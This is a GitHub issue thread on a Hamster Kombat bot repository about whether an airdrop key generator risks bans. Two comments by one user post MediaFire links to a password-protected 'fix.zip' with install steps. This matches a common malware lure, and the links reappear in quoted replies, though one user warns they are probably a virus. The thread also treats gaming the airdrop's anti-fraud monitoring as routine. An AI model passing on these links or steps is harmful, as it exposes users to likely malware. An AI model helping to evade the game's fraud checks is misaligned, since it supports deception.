### ISSUE TITLE
Is key generator safe?

### ISSUE THREAD

**Issue by Microzibert** [masterking32/MasterHamsterKombatBot#228]
From official hamster combat TG

_🎁 We want to clarify that keys will impact the size of the airdrop but aren’t required to participate. To prevent fraud, we can't reveal more details now, 
**BUT** we are closely monitoring key generation services and recording all artifacts obtained dishonestly. This will be taken into account for the upcoming airdrops!_ 

How big is the chance of getting banned?

**Comment by Fy0urM** [comment]
> How big is the chance of getting banned?

The odds are the same as the odds of dying by drinking a mug of tea. no one knows, technically the key generator replicates the natural behavior of the real game.

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tboy1337** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/6mkbh6xhau31g password: changeme when you installing, you need to place a check in install to path and select "gcc."

DO NOT DOWNLOAD 
PROBABLY A VIRUS!!!!

**Comment by tboy1337** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme when you installing, you need to place a check in install to path and select "gcc."

DO NOT DOWNLOAD 
PROBABLY A VIRUS!!!!

**Comment by Microzibert** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme when you installing, you need to place a check in install to path and select "gcc."

**Comment by tboy1337** [comment]
@Microzibert you can delete your comment with the link in it, support has dealt with the original poster.
